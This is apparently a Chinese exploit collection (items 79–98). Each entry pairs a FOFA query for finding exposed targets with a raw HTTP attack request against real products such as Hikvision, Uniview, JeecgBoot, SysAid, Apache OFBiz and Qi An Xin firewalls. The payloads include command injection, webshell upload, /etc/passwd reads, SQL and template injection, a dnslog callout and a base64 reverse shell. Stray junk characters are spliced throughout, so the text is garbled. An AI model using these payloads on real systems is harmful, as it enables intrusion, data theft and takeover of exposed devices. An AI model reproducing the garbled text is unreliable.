2 d, ?+ e$ ?1 c+ Y: o79. BYTEVALUE 百为流控路由器远程命令执行" E. U. A |+ A0 c
FOFA:BYTEVALUE 智能流控路由器
" a( p- {3 b8 U( ?4 oGET /goform/webRead/open/?path=|id HTTP/1.1
2 A2 d9 p$ m( u+ b YHost:IP0 z6 @) U' P: D. f1 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
E3 v# K" }' G; r: [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ `4 r6 ^- [4 q7 d" M/ b8 a; iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% x1 C* n5 A* j" ?7 _ rAccept-Encoding: gzip, deflate( b# `! `* ?$ u% ^6 F6 G
Connection: close
- o. M) [3 K: G! n$ JUpgrade-Insecure-Requests: 17 ?- x# }8 Q2 [4 x
j+ A5 G: k( `+ y* Z3 t
. t8 ?) e0 h$ T$ R1 V! c5 E; m
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
7 O# J+ D+ Z' k" PFOFA:app="速达软件-公司产品"
) } Y1 m4 X) APOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
1 y+ h0 ]+ x# [: z4 S; B$ y0 o, m, F8 sHost: x.x.x.x3 w8 g+ T4 A& U! C6 Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: {0 v8 o) E+ ?3 V/ H/ C. S$ VContent-Length: 27" ]/ _ |, y+ R9 a: Q4 G4 X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! i" W/ Z0 _! }7 A, c! Y
Accept-Encoding: gzip, deflate
9 l( G5 u4 k2 e% ~# X5 ]5 o; VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; U. f9 p1 v% k* p1 D7 j* V; D% e. R
Connection: close
+ c9 g1 D* t) e4 `/ B3 SContent-Type: application/octet-stream
! M# {# U/ H1 `% s9 tUpgrade-Insecure-Requests: 16 n, h6 }/ _( T, `. b+ i& [$ N
Q/ L! v9 R8 p* S. n( ?! o<% out.print("oessqeonylzaf");%>
* q" k, [3 v# d) S" ~% [; ]5 K; S1 C/ y$ w, d# q5 O# j
; S" ^. [, D4 {3 V! e0 P
GET /xykqmfxpoas.jsp HTTP/1.1
8 Y" f; |1 v; W& ?Host: x.x.x.x
* W! f! A/ G7 X7 bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 \5 B, ?! A/ d( p; wConnection: close
- a0 m5 L; p4 F- FAccept-Encoding: gzip
8 l& l) c) J5 E* G1 \8 _( O1 o$ q* h6 K* v8 h
; f- U8 {( Z( k2 ?
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
6 Y6 F* H# E4 f; TFOFA:app="uniview-视频监控"( C. E- p( C9 c: ~
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1, T A( v) X2 Y/ L7 _" b" P
Host: x.x.x.x* r. z1 I1 u, J+ F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 n2 {: y" ~) v" HConnection: close% @* v9 _) j) ]1 r
Accept-Encoding: gzip
) r7 A; P3 E: R' V$ p- O Z' w9 @. I
* R" Z! J; ^- }% x
) r: N# m& t6 _; y% ]82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
7 Q. ^) R6 o p2 ?$ G: uFOFA:app="思福迪-LOGBASE"" {3 I, ~. r; P: B8 A( A( w; v
POST /bhost/test_qrcode_b HTTP/1.10 O5 X$ @0 n. O
Host: BaseURL
6 n2 O. R) a) U5 S. o5 k( _% |' {6 p0 mUser-Agent: Go-http-client/1.1: p% Z+ y( o' m6 _
Content-Length: 23
$ t! B+ C( Y* N+ f/ K3 ~. ZAccept-Encoding: gzip; ~: \* m: K+ m8 \
Connection: close
2 o y" t+ Q. y" SContent-Type: application/x-www-form-urlencoded% Q! b/ A$ [! V& R2 j
Referer: BaseURL
. n, G# T" b* Z- i- P: w9 y6 z0 ]5 p3 F2 V6 Z
z1=1&z2="|id;"&z3=bhost
& }3 g- y3 |+ d3 i4 ~8 g6 m4 Y- D+ E) `9 F6 j- r. ~0 X6 `2 G; S
% Y# n: f o3 M* O( x
83. JeecgBoot testConnection 远程命令执行
: q6 i8 {* g2 [: R" tFOFA:title=="JeecgBoot 企业级低代码平台" o7 q/ l4 y! }
: i5 T' b9 F7 K" F5 X- V, W
4 L6 p9 E6 {) N, |1 Q" ], _
POST /jmreport/testConnection HTTP/1.1
{* O, D" ]# b6 RHost: x.x.x.x
8 z6 z. w: A4 `3 YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& n o, b. ~, I) v% }: n& ]Connection: close5 u( R0 {' a% n, Z
Content-Length: 88818 j9 B8 O2 f) N; B- A" w0 H
Accept-Encoding: gzip" I, u' y1 B d# J8 Z& `
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
2 f2 [8 t' f) @' u5 nContent-Type: application/json' G/ S6 s& P9 l$ \
2 W& t4 Z6 A: ]: i) d; SPAYLOAD/ t( M# a* ?1 v3 Y# F$ n& e: \
' H! i7 W2 O/ W$ A) k84. Jeecg-Boot JimuReport queryFieldBySql 模板注入' Y% V6 X. L$ t
FOFA:title=="JeecgBoot 企业级低代码平台"
" G* o- T% S1 x( Q1 [! w; Z2 M! j9 @, x1 S- p' L/ i) C- U1 g, I" I
6 V/ @: x8 v/ n0 d6 q7 n- H
3 k) f6 m% v) H) t, d* APOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1/ n* N8 K3 |5 h u
Host: 192.168.40.130:8080' e( ~! {: t, E# q7 }
User-Agent: curl/7.88.10 T9 f2 U G4 _1 P9 X, u) |
Content-Length: 156
; _: K9 B k* V) @5 ]Accept: */*
7 V; y1 I: e- |1 S* m* u+ y" Z7 b& }Connection: close9 L/ X z ]1 a, c6 S0 b( S9 s+ z
Content-Type: application/json
" }( x% W% M s% W" H* T! i; D! IAccept-Encoding: gzip$ ]8 K7 C& Y# }% @
" _0 K6 E. U7 y7 c- U/ R% L{$ h3 [3 G/ D/ u4 L( ^# ?1 p
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
" H6 j4 u m2 A# m0 k" F& ^ "type": "0"
9 O: D1 [, X. j6 V5 M4 `}
% _2 g5 v* [9 Q9 {9 V: m1 e- v4 Q ]" ?) C0 l- C4 _! \. n) h d
. W( z: f( B& ^/ u6 g85. SysAid On-premise< 23.3.36远程代码执行" i' q2 ~5 ^) F% d' `
CVE-2023-47246
- @6 ?: W; R8 T# E) b. [/ w: |8 ZFOFA:body="sysaid-logo-dark-green.png" : O" t5 m" `8 o: b* g
EXP数据包如下,注入哥斯拉马
& G+ J ~# Z8 w" }( ~POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
, b& M! w! T, T: K# a0 ^Host: x.x.x.x
5 H9 S! g; v; b- f6 I5 HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% t9 e5 `/ O( IContent-Type: application/octet-stream: u# S [9 c; e U4 q
Accept-Encoding: gzip$ S0 k3 w% H) {4 h q7 W
/ h% H0 `+ A4 F; h8 l7 J( \
PAYLOAD I' t4 ]" x4 n' f
+ s z4 X- j+ x6 y/ d
回显URL:http://x.x.x.x/userfiles/index.jsp
( T9 A" v: z- x5 F/ v9 {1 ^/ r) T: N. v" F+ D) I
86. 日本tosei自助洗衣机RCE
]( g9 s" p4 ]FOFA:body="tosei_login_check.php"
+ T* K7 _6 k$ o. L0 H; C/ XPOST /cgi-bin/network_test.php HTTP/1.11 R$ ~& z) r1 r+ w/ v3 e
Host: x.x.x.x
3 W e* b, K2 L; F- o7 Z" [) DUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36- U( s% M0 `/ i0 Q
Connection: close
* g& P- k# w* S9 B/ p# aContent-Length: 44
/ L/ a7 L% L* u' }" XAccept: */*( T8 U% J. O/ {4 J" D
Accept-Encoding: gzip9 R$ L% e7 Z2 X! L7 _' O! j
Accept-Language: en
& }9 h( N+ o2 J3 ]# j2 I, B3 g6 Z3 DContent-Type: application/x-www-form-urlencoded4 i( Z2 ` k+ h7 G1 u
" W! Q9 n9 ?1 t1 f; r
host=%0acat${IFS}/etc/passwd%0a&command=ping
5 l2 i- }+ U+ M- i$ Y$ D. e$ [6 d' `+ W7 J
: Y$ A, ?5 O; h% t/ v/ q
87. 安恒明御安全网关aaa_local_web_preview文件上传
& q, I4 N" Y+ L* p% bFOFA:title="明御安全网关"# g* R; a* V' z6 V
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1" w# X7 f, L, F; q6 O- L1 {5 m: g
Host: X.X.X.X
5 W+ |9 V0 ?1 l# }& |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, A1 A2 ]" p+ H" R$ eConnection: close. i a1 t" b9 E) Y/ _, I
Content-Length: 198
2 _ U7 V0 Z3 T4 h. d4 o) d$ W: a! C0 EAccept-Encoding: gzip
0 ^! {3 U5 [2 I! _Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd# C5 z1 u5 M6 M; G
R+ b, T+ F2 e& H/ C4 X
--qqobiandqgawlxodfiisporjwravxtvd- Q( \$ n1 ^4 A( o0 h% F
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"4 @* w& D G" W: Y
Content-Type: text/plain
! \& D/ M$ M" b# N2 h/ h% P3 I7 H5 N$ d7 Z M$ o
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
/ _0 M1 s' C1 a( S3 v" u! ^--qqobiandqgawlxodfiisporjwravxtvd--. i# d' h* E `' S; @& ]
$ U" q- D8 O( _3 A9 y
! H0 s& Z) P% |% o0 A/jfhatuwe.php' D: L- Z7 L" S0 E: d5 K" k
$ z: F/ @3 z# `
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行! H% R7 r- Q. i6 f/ v. F' ^/ Z
FOFA:title="明御安全网关"
% Z& M/ X9 {( AGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1& ^% t( g% _0 B* l$ u) \8 o
Host: x.x.x.xx.x.x.x
* c! Z2 a& M: N& V3 Y6 dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 A# C. a' D7 T6 r( e) R* A: OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) f# v n" s& p: J* t3 U
Accept-Encoding: gzip, deflate* d) Z' [4 S: I' ]9 V0 [0 C) O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 i# a S1 w% UConnection: close
1 {+ F7 B2 G" N) k2 }8 P7 A- } S4 x3 f, {. w" r
# `$ v! y* [- d
/astdfkhl.php
, _+ i: G3 D$ o* I( J- @" y6 O
7 ^& I3 q2 T8 U) {% ~9 k! Z' f89. 致远互联FE协作办公平台editflow_manager存在sql注入
! h6 e% i8 L; h8 J: `: N* M) v! ~. k4 b' YFOFA:title="FE协作办公平台" || body="li_plugins_download"
& r( I& \4 \9 P% t6 [7 uPOST /sysform/003/editflow_manager.js%70 HTTP/1.1
9 v3 R( G6 h9 O% Q( NHost: x.x.x.x; ~' R. t. m; y9 u/ c' `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! }. x( W- o+ `. }6 U3 tConnection: close
; M6 X+ a, [8 ]3 r/ hContent-Length: 41
" k/ h( _1 E j+ v. sContent-Type: application/x-www-form-urlencoded
: b' ^9 i5 x, }3 D7 m6 VAccept-Encoding: gzip
1 K% t$ P2 R5 q# Y
6 X+ Y7 F; e3 d" s/ @2 foption=2&GUID=-1'+union+select+111*222--+
/ e& B. ?/ e+ y
, f8 E( Z$ m/ T5 u1 y7 S$ \% ?9 H
( w8 w7 [: L8 l6 ^: S& w90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
; l0 N3 t3 u4 K: v/ ~5 Y8 R+ b a( x5 FFOFA:icon_hash="-1830859634"
4 H; J6 B; r/ U2 MPOST /php/ping.php HTTP/1.1
@4 A# L Z/ h: b1 _9 u( hHost: x.x.x.x; A' v6 Q- [! [3 C) @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0* @7 }: H5 o% M7 M
Content-Length: 51) ~/ R1 K; {8 ]" ~
Accept: application/json, text/javascript, */*; q=0.01
5 M, Y5 @4 n7 cAccept-Encoding: gzip, deflate- D/ E# |* _% ?& d9 [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' Y% P0 g1 }$ z3 i0 N) q* d+ H$ iConnection: close
& m5 s. f; E, hContent-Type: application/x-www-form-urlencoded
0 n* g4 y) o$ i) p3 b# f6 yX-Requested-With: XMLHttpRequest4 R1 }. F2 [ W; t
. g2 ~# B9 L; r s! ?9 F0 y1 Mjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
) H Q, c# K9 r. \! Q2 b3 c' y3 y# k' \; u" _
0 a% K+ a6 }6 O3 A# {91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
: A! ]# ?# w3 P' w0 j# n) iFOFA:title="综合安防管理平台". Z; @* ~' M& l# r/ ]
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
6 f) P- D0 M' g. f: a) [Host: your-ip; Q3 N# S$ P8 v5 M2 W6 ^) C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.361 L1 |: ^$ m7 f0 ~$ B5 u
Accept-Encoding: gzip, deflate1 W, }- f8 b/ P+ [6 E0 J
Accept: */*
. \6 V5 A4 F5 d- x; Z, [Connection: keep-alive
7 F+ A e! b2 n1 R: c
6 c9 U" y! l* u4 y2 [2 N- B9 k0 W4 H7 J$ Q( a
: p' Y- P! r# L/ s& j1 V
92. 海康威视运行管理中心session命令执行7 Q( ?# I4 S' l5 w+ s$ `
Fastjson命令执行
4 p7 c2 A; a! j+ Q/ t Khunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
4 ^1 |6 ]# ^# G! T9 v8 y7 gPOST /center/api/session HTTP/1.1
4 e1 t+ q0 G& a. t, {& V( v# AHost:
; j6 M' w% g' J' q$ tAccept: application/json, text/plain, */*
4 N n( w! w: {% I& cAccept-Encoding: gzip, deflate
7 ~( J9 l! _# ~6 u5 iX-Requested-With: XMLHttpRequest2 p) Y6 M/ f4 ~
Content-Type: application/json;charset=UTF-8" |8 M4 b$ w2 Y# X% ^- j
X-Language-Type: zh_CN
1 d& j4 S. c" v! A& s0 Y4 m& lTestcmd: echo test2 B( z; {: v0 b' g- d6 \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
5 W: p/ _; n1 p, B) M( g( V# k% gAccept-Language: zh-CN,zh;q=0.9
! r6 T0 l" F) d) ]- v4 q, i* iContent-Length: 5778
7 e+ }- c$ P( z& u, N" |
8 Z2 E0 O5 U3 i4 ?& RPAYLOAD1 W6 P; C8 ^$ r+ t0 G- z
! k% E/ P2 J" P" |: G
3 ?! @* z3 \9 U; \' D: A93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
7 e ~; G+ ?0 Q2 N& cFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
/ |+ U& V4 f( w# n; b$ {/ `POST /?g=app_av_import_save HTTP/1.1
8 I2 @ S& X1 Y4 f, eHost: x.x.x.x0 ?) k: y" d6 l5 \/ P D8 ?
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx2 ~) J( y* k+ o
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ t0 B, w- \) l5 C) y! W3 L, F/ c% W; a
& S) a% z3 S) ?- Q$ w* w C% U: `' ?# x------WebKitFormBoundarykcbkgdfx
. K h$ I, t, x% |$ |Content-Disposition: form-data; name="MAX_FILE_SIZE"
" n' Q3 ?- X! x" F
4 ~0 c! _; \0 D' M+ _10000000
& L' p: R6 ?) o, d! V2 D5 ?------WebKitFormBoundarykcbkgdfx
' `3 [( A# Q( `0 w% k% TContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"# |9 [3 N6 p; H- r7 k9 R m
Content-Type: text/plain
& t* K: u3 K% I8 y/ ]6 q* J* |7 A; K5 a6 N
wagletqrkwrddkthtulxsqrphulnknxa
' p. h9 ] D, ^3 j; n7 }------WebKitFormBoundarykcbkgdfx3 L2 V0 U$ m) U' c) D
Content-Disposition: form-data; name="submit_post"7 O3 N( Y( C0 u, q9 {! X# y
2 i9 w* L. U+ ~9 ~/ k
obj_app_upfile
( m0 X4 C% z7 p T, ^------WebKitFormBoundarykcbkgdfx! u2 q7 Z$ `7 z2 b0 O" g# ?* E
Content-Disposition: form-data; name="__hash__"1 U9 `9 [1 F% Z/ V) F
x, Q+ R$ a3 C- x8 f0b9d6b1ab7479ab69d9f71b05e0e9445
p! o+ z3 K: ]0 b------WebKitFormBoundarykcbkgdfx--+ c7 x; i2 y( ] z4 f; J
0 m4 H# ]& x1 A
0 ]: B8 [$ B$ I9 k/ t0 r$ MGET /attachements/xlskxknxa.txt HTTP/1.1
2 {5 p+ k6 l4 d5 AHost: xx.xx.xx.xx
, i2 f# L, d9 G5 J6 ^) p2 qUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
7 G/ P) b5 ?+ S# B9 F- R3 R
2 c- I7 Z$ D3 A$ G8 S- a4 U5 B
* [1 ?- C3 _1 u2 u4 R" ~. [, c! ]94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传7 ?# W6 H$ a7 d# Y: k# i
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="( ]) K, t5 [& [8 ]- u
POST /?g=obj_area_import_save HTTP/1.1
0 D! n2 x+ J1 ^# b% h: |Host: x.x.x.x
5 L8 @8 u6 ^0 x- n q8 ZContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt+ r* _" J( v) i3 d* R# x) E1 A4 [* n! f d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36& y- B/ j5 n% f7 V- B+ N/ m3 t
( D) g* J3 L: p8 B2 e! o------WebKitFormBoundarybqvzqvmt! B$ l, _* t) i+ C7 W$ t
Content-Disposition: form-data; name="MAX_FILE_SIZE"
9 Z: U. ?; b8 I5 p7 B0 H: r- V# S3 q1 A4 c/ l9 D, [! z
10000000
2 A2 `" C+ Y t4 [/ H: b- T3 h. g------WebKitFormBoundarybqvzqvmt
! e8 d3 ^) s! u3 B% U \3 I, v# sContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
9 i- K; m, ^5 H: CContent-Type: text/plain
9 w; S; i/ `& n- j& h: Y2 x
, S4 ~1 j4 x2 r/ ]pxplitttsrjnyoafavcajwkvhxindhmu. q, D7 Y7 F1 z$ b9 G. d
------WebKitFormBoundarybqvzqvmt
) i& j: M6 \. N' a. ^Content-Disposition: form-data; name="submit_post"
% t8 K0 D7 w3 Y: `' }/ s) M3 d4 B" E4 l& _! B6 L2 j% [# V
obj_app_upfile) \' H _: X4 l& L: j
------WebKitFormBoundarybqvzqvmt
j# C1 ~- S" F. ^: p, K1 ]Content-Disposition: form-data; name="__hash__"
' M' g# S2 z4 `; g0 v6 G
& m* g# ?9 l7 \# u& @1 u$ I& \) i' W0b9d6b1ab7479ab69d9f71b05e0e9445% g) t) a( \ j8 w( B
------WebKitFormBoundarybqvzqvmt--
: V0 z" i( c- k% {8 @7 V" ~
$ P0 O6 Y/ K5 Q, M8 u- B; ]* p, ~) U# f7 [) d3 P F$ F
( I" d% @6 u L+ I: h) i
GET /attachements/xlskxknxa.txt HTTP/1.1: c5 e! g% o0 j$ e
Host: xx.xx.xx.xx
" t! K, A7 n+ j& A3 E* n \( qUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
. x9 V7 w, A8 E6 s ]0 w
, m9 E* Y8 Y4 m- H8 K) Z0 S1 |5 @! `
) d; H* p! p( o( K
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行4 g% ]4 X1 }+ U! p
CVE-2023-49070
9 l/ @2 z9 k8 y5 r) v8 IFOFA:app="Apache_OFBiz"7 q5 ?" S) K: E8 g# _- w
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
/ \6 R- Q7 z4 A, { CHost: x.x.x.x
# T2 D) z: M8 N3 s3 x8 M9 L9 K6 ^User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.364 r, m! M2 i ?6 K- z# T6 p0 w
Connection: close
- } Y% h$ r3 u: Y4 ]# r, _- HContent-Length: 889
$ d6 J; ~2 \% `Content-Type: application/xml
% \& L3 k- } \. tAccept-Encoding: gzip
0 Y; ~7 b2 ~! o( t- O
1 s V0 X# o, K<?xml version="1.0"?>1 o1 W; n" Q; S8 u# b8 M
<methodCall>/ G- A1 T) C; U: w) k
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
: k; n( F$ u: s. y8 D <params>
' s$ u) r! b) B5 g* b& z& ~ <param>
# R/ u5 |6 Q9 T3 ~, E" u9 B <value>8 y9 N! X8 `3 J2 ^ ~9 K
<struct>8 l* E! a- d; h$ l9 d
<member>
}0 ]( `% O N% L" X$ D* u <name>test</name>7 k6 Q9 w2 Y' v. E2 T+ X6 @# C
<value>
S! @; c/ L9 M J" x5 \ X8 r <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
3 Y" W, t% C3 @+ F: z- z- H </value>
4 C, X3 Q% R/ V$ ?; y5 O4 k* K0 T4 d </member>
& h" [2 Y$ v( A- N </struct> J6 y9 l6 v6 M
</value>/ H$ [$ ~# D! C- ~
</param>
1 D" @+ R, x0 t: F; O6 w0 `3 ]7 P3 R </params>% ]# ?+ \4 Z7 Q" x/ L; D: e
</methodCall>
6 u T e* K9 F- e/ F
O D# D$ T P+ Z( |8 e. \
3 J ]3 ~7 I* Q" u( ^9 T用ysoserial生成payload
; s |* R: S4 C" f0 }: G' qjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"0 X+ O+ m7 @( @" o8 b) V) P$ q3 ^: f
/ V; q2 l' a7 P# e
: v, B& ?$ w. B! Y6 z g1 {将生成的payload替换到上面的POC5 q( S, E, Y: o. i
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.10 ^5 Z" o/ b/ B3 G8 }# N
Host: 192.168.40.130:8443
1 v6 r7 K' T1 C# CUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36' {& P; I+ G. _/ D9 D9 ^4 q& W% U: A
Connection: close: h7 R z( B* P$ b1 M2 m' A
Content-Length: 889
) M3 \# q5 [+ v7 v1 D9 j' V n ZContent-Type: application/xml
4 G$ y; _# A1 t6 QAccept-Encoding: gzip
; P4 m* Q+ Y8 O5 E0 {+ m- J; m% s# a! G5 D
PAYLOAD _7 F! b6 r& R
' p1 e7 w2 M$ Q
96. Apache OFBiz 18.12.11 groovy 远程代码执行
, F; C8 s0 y3 { bFOFA:app="Apache_OFBiz"4 T9 N0 e' D/ }, U/ g
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
W. `! P8 s1 A2 Q) W* @Host: localhost:84433 {+ H \5 L/ U& O1 ~5 I f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
& p w# v- [; @+ o4 EAccept: */*" G8 C: b: o6 l4 U0 F g' ~
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% B- \6 l* S& j, ?+ F7 I. }
Content-Type: application/x-www-form-urlencoded
. B8 W$ x" s2 ^: F' yContent-Length: 55( h' X/ E k: H1 q+ o
; P0 |7 r9 l% n) J( [groovyProgram=throw+new+Exception('id'.execute().text);
7 a/ h, J8 o# R( p8 q- X) |
n: y, Z/ x4 T; D h5 H7 v2 O' D9 m4 }8 ], |2 A
反弹shell9 c8 o2 a1 ~- |
在kali上启动一个监听9 k2 P" q! M9 }0 ?4 M- W+ l6 \
nc -lvp 77773 V3 M I0 F3 y( ^; i
0 O4 H: q- X& U# RPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1) _# x" e; [4 i4 r% b: z3 K8 ~
Host: 192.168.40.130:8443
6 ^% e) P, n1 F. r6 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
: @" c, J8 J8 c3 o$ ?' z, ^1 C# YAccept: */*4 Y* D+ h# M, I p: p
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 E& \% f$ Y" K4 d8 {( n' ]; KContent-Type: application/x-www-form-urlencoded
5 B* t; P! y- b! S9 rContent-Length: 71 |$ |4 F* a# @9 ^% r& F! j/ c
: S! V; H$ ~4 V7 P3 |2 n
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();# W& l4 ?: `3 I2 }% \
, m( p% G c( b3 @2 L" o8 c
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行. f$ m7 I& L9 R. j# i! ]
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"( T( H. S! B' Y
GET /passport/login/ HTTP/1.1
. O* c' h+ z: I5 C4 n/ r1 mHost: 192.168.40.130:80858 `# v2 c4 m' B+ R8 ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' B9 f1 r2 u$ K, xAccept-Encoding: gzip
9 d$ D$ F; |5 x% a8 ^ ]Connection: close- U- K# R0 K) R
Cookie: rememberMe=PAYLOAD# W$ g$ N0 X2 J# J
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
( F+ ]. W; k t8 {& b& t# h! L/ d, m$ \# q6 j
. b& N1 n0 G) f
98. SpiderFlow爬虫平台远程命令执行: J! D! f' c" X( j9 _9 {
CVE-2024-01954 t8 H4 q3 r- [' J! B4 m7 g* T
FOFA:app="SpiderFlow"
2 v0 @# b6 S" q xPOST /function/save HTTP/1.1
4 d6 m; x: c# R" F3 K0 o2 u" THost: 192.168.40.130:8088( q, @3 Z+ @. \- { q1 M& v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
9 _' S9 l D; B1 G# d$ |Connection: close
9 s' a* C' f+ P# L R: ` lContent-Length: 121
& G- v8 g; J7 W! s- j0 ~Accept: */*4 P+ s9 K- E: x1 p8 U) o
Accept-Encoding: gzip, deflate
0 i1 Y! @% c4 \, G' T9 EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 k6 X6 u3 c" k
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
% V" l* z$ i: Z% B! [( ]X-Requested-With: XMLHttpRequest
